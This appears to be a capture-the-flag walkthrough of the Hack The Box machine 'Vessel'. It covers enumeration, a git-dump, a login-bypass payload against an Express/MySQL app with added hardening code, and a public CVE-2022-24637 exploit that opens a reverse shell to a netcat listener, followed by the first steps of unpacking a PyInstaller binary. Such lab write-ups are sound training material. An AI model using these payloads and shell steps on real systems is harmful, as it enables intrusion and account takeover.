Vessel
Let's start off with nmap:
nmap -sC -sV -T4 10.129.227.225
Host is up (0.058s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 38c297327b9ec565b44b4ea330a59aa5 (RSA)
| 256 33b355f4a17ff84e48dac5296313833d (ECDSA)
|_ 256 a1f1881c3a397274e6301f28b680254e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Vessel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Only ports 22 and 80 open. Let's skip SSH and head to http!
Wappalyzer tells us that the site/backend is built with Express/Node.js, and the footer reveals a domain, vessel.htb. First, let's add that to our /etc/hosts:
sudo nano /etc/hosts
File should look like this:
127.0.0.1 localhost
127.0.1.1 joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.225 vessel.htb
There also seems to be a login page:
There's also a register page but it does not seem to be functioning.
Next, let's run gobuster to find endpoints/pages:
gobuster dir -u http://vessel.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -t 30 --exclude-length 26
After not too long we get some results:
===============================================================
2023/01/16 19:52:40 Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 171] [--> /js/]
/logout (Status: 302) [Size: 28] [--> /login]
/img (Status: 301) [Size: 173] [--> /img/]
/404 (Status: 200) [Size: 2393]
/dev (Status: 301) [Size: 173] [--> /dev/]
/. (Status: 200) [Size: 15030]
/admin (Status: 302) [Size: 28] [--> /login]
/register (Status: 200) [Size: 5830]
/500 (Status: 200) [Size: 2335]
/css (Status: 301) [Size: 173] [--> /css/]
/401 (Status: 200) [Size: 2400]
/login (Status: 200) [Size: 4213]
/reset (Status: 200) [Size: 3637]
Dev seems interesting, let's check that out! It seems that /dev/ redirects us to a 404:
But earlier we got a 301 redirect from /dev, which is strange. Also, brute forcing directories under it does not show any results. But since the pathname is dev, maybe there's a git repository? Let's try using git-dumper. Note: sourcecode is the folder name where the script stores the results.
git-dumper http://vessel.htb/dev/ sourcecode
That did it! Let's take a look at the login function:
At first it seems like there's nothing exploitable, but according to this article this is not secure and we can bypass it with the payload:
username=admin&password[password]=1
Basically, this payload makes the application build a query like this:
SELECT * FROM accounts WHERE username = 'admin' AND password = `password` = 1
which is always true if the database has a user named admin.
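To see why the bracket payload works, here is an added example (not code from the writeup or from the Vessel application) that models the two pieces involved: Express' extended form parser turns `password[password]=1` into a nested object, and mysqljs-style value escaping renders an object as `` `key` = value `` pairs, so the password comparison collapses into a column-to-column comparison. The parser and escaper below are simplified stand-ins for the real `qs` and `mysql` packages (the real escaper quotes the string "1" as `'1'`, which is what appears here; MySQL still evaluates `(password = password) = '1'` as true). The hardened builder shows the fix: reject non-string credentials and use bound parameters.

```javascript
// Added example: model of the Express + mysqljs behaviour behind the
// `password[password]=1` bypass, beside the hardened version.

// Simplified model of an "extended" form parser (real Express uses `qs`):
// `a[b]=c` becomes { a: { b: "c" } }, a plain `a=c` becomes { a: "c" }.
function parseForm(body) {
  const out = {};
  for (const [rawKey, value] of new URLSearchParams(body)) {
    const m = /^([^[\]]+)\[([^[\]]*)\]$/.exec(rawKey);
    if (!m) {
      out[rawKey] = value;
      continue;
    }
    const [, outer, inner] = m;
    if (typeof out[outer] !== "object" || out[outer] === null) out[outer] = {};
    out[outer][inner] = value;
  }
  return out;
}

// Simplified model of mysqljs `escape()`: numbers pass through, strings are
// quoted (with a reduced escape set), and an object becomes a comma-separated
// list of `key` = value pairs. That last rule is what turns a nested object
// into a column reference inside the WHERE clause.
function escapeValue(v) {
  if (typeof v === "number") return String(v);
  if (typeof v === "string") {
    return "'" + v.replace(/\\/g, "\\\\").replace(/'/g, "\\'") + "'";
  }
  if (v !== null && typeof v === "object") {
    return Object.entries(v)
      .map(([k, val]) => "`" + k.replace(/`/g, "``") + "` = " + escapeValue(val))
      .join(", ");
  }
  throw new TypeError("unsupported value type: " + typeof v);
}

// Vulnerable pattern: the request fields are escaped and concatenated without
// checking that they are strings, so an object slips through as SQL structure.
function buildLoginQueryVulnerable(body) {
  const p = parseForm(body);
  return (
    "SELECT * FROM accounts WHERE username = " + escapeValue(p.username) +
    " AND password = " + escapeValue(p.password)
  );
}

// Hardened pattern: enforce the expected type before the value reaches the
// driver, and hand the values over as bound parameters rather than SQL text.
// Returns null when the input must be rejected (an HTTP 400 in a real handler).
function buildLoginQueryHardened(body) {
  const p = parseForm(body);
  if (typeof p.username !== "string" || typeof p.password !== "string") {
    return null;
  }
  return {
    sql: "SELECT * FROM accounts WHERE username = ? AND password = ?",
    params: [p.username, p.password],
  };
}

// Defender's check over a raw login body: report fields that arrived as
// bracketed (nested) keys, which a plain login form never legitimately sends.
function nestedFieldNames(body) {
  return [...new URLSearchParams(body).keys()]
    .filter((k) => /\[.*\]$/.test(k))
    .map((k) => k.split("[")[0]);
}

// Constructed sample requests: the bypass payload from the writeup and a
// normal login.
const BYPASS_BODY = "username=admin&password[password]=1";
const NORMAL_BODY = "username=admin&password=secret";

console.log(buildLoginQueryVulnerable(BYPASS_BODY));
console.log(buildLoginQueryVulnerable(NORMAL_BODY));
console.log(buildLoginQueryHardened(BYPASS_BODY));
console.log(nestedFieldNames(BYPASS_BODY));
```

The type check matters more than the choice of driver: with `express.urlencoded({ extended: true })` any field can arrive as an object or array, so every value destined for a query should be validated as a string first, and the driver should see it only as a bound parameter.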
Let's log in and let Burp Suite intercept our request:
We get in:
The analytics link leads us to another subdomain, openwebanalytics.vessel.htb. Let's add it to our /etc/hosts file:
127.0.0.1 localhost
127.0.1.1 joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.225 vessel.htb openwebanalytics.vessel.htb
The analytics site seems to be built with Open Web Analytics, which is open source software. Looking at the source code we even get the version in use:
Quick Googling reveals that version 1.7.3 is vulnerable to CVE-2022-24637, and there is also a public PoC available on GitHub! Let's download the exploit. Before running it, let's set up a netcat listener on port 9001:
nc -lnvp 9001
Now, run the exploit:
python3 exploit.py http://openwebanalytics.vessel.htb/ 10.10.14.90 9001
And we get a shell as www-data!
joonas@joonas-VirtualBox:~$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.227.225 46914
ls
1
1ZDJPckC.php
cache.lock
whoami
www-data
We have access to user steven's home folder and there's some kind of passwordGenerator app. Also, there's a .notes folder with two files: notes.pdf and screenshot.png:
cd /home/steven
ls
passwordGenerator
ls -la
total 33796
drwxrwxr-x 3 steven steven 4096 Aug 11 14:43 .
drwxr-xr-x 4 root root 4096 Aug 11 14:43 ..
lrwxrwxrwx 1 root root 9 Apr 18 2022 .bash_history -> /dev/null
-rw------- 1 steven steven 220 Apr 17 2022 .bash_logout
-rw------- 1 steven steven 3771 Apr 17 2022 .bashrc
drwxr-xr-x 2 ethan steven 4096 Aug 11 14:43 .notes
-rw------- 1 steven steven 807 Apr 17 2022 .profile
-rw-r--r-- 1 ethan steven 34578147 May 4 2022 passwordGenerator
cd .notes
ls
notes.pdf
screenshot.png
After downloading the files to our machine (you can use netcat for that), let's check what they are all about:
The passwordGenerator seems to be a Windows executable:
joonas@joonas-VirtualBox:~/Documents/htb/vessel/$ file passwordGenerator
passwordGenerator: PE32 executable (console) Intel 80386, for MS Windows
joonas@joonas-VirtualBox:~/Documents/htb/vessel/$
The screenshot seems to be a picture of the app:
And the notes.pdf is a password-protected pdf file. Time to reverse the generator.
Running strings on the app prints many instances of python and python 3.7, so chances are it is a Python-based app. Binwalk also gives the impression that the file is packed. Python-based executables are usually made with PyInstaller, and we can try to reverse that. There's a package, pyinstxtractor, which can do this for us. It is good practice to use the same Python version on our machine as the app was made with; in this case it's 3.7. For this we can use pyenv. After setting up Python we can run pyinstxtractor:
python pyinstxtractor.py ../reverse/passwordGenerator
joonas@joonas-VirtualBox:~/Documents/htb/vessel/pyinstxtractor$ python pyinstxtractor.py ../passwordGenerator
[+] Processing ../passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: ../passwordGenerator
You can now use a python decompiler on the pyc files within the extracted directory
TO BE CONTINUED